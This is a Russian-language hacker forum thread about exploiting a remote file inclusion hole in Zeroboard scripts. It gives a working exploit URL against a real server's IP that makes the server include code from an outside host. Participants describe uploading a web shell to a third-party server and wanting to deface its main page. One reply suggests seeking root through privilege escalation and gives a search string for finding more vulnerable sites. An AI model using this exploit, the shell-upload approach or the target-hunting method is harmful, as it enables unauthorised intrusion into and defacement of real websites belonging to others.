желающие заюзать дырку: ______________________________ Читать здесь: http://www.securitylab.ru/51565.html ______________________________ Пример здесь: http://211.172.232.86/~sdtech/zeroboard/skin/zero_vote/error.php?dir=http://rredial.narod.ru/ ______________________________ видео сделаю завтра, если никто раньше не сделает
В данную директории нет прав (и не показывает), а вот в другую, конечно можно ~sdtech/zeroboard/data/ называется...
А они ее уже переименовали Но это мне естессно не помешало шелл залить. Вот только 4то дальше делать. Папка борды только для 4тения и Remview пишет (ONLY READ ACCESS). Подскажите, как мейн в таком слу4ае поменять(я имею ввиду никак ли я не могу chmod 777 сам выставить)!
Я не пойму, что ты хочешь делать то? Если менять права файлов, то смотри, кто владелец и смотри кто ты, так и делай выводы. А если у чужих файлов и дерикторий, то у тебя прав нет ищи уязвимость и получай рута (на античате были эти материалы о повышении прав). А именно этот сервак я в пример привел, там даже не ковырялся. Набери в гугле Copyright 1999-2001 Zeroboard и вперед - там на каждой странице дырявых вкриптов по пять штук. К стати видео я отправил администратору, тока плохенького качества, но достпно ).
Я просто хотел дефейснуть мейн, но прав естсено нет (хотя само обидное, 4то шелл залит) Надеюсь ты в видео как-то выкрутился и дефейс сделал... ВИДЕО - НАРОДУ!!! =)
Я там на другой сервак заливал, там по мойму все расшарено было..., не помню..., а дефейсить не стал, зачем - сам факт заливки работоспособности программы - уже результат. Я ж не злой хацкер )
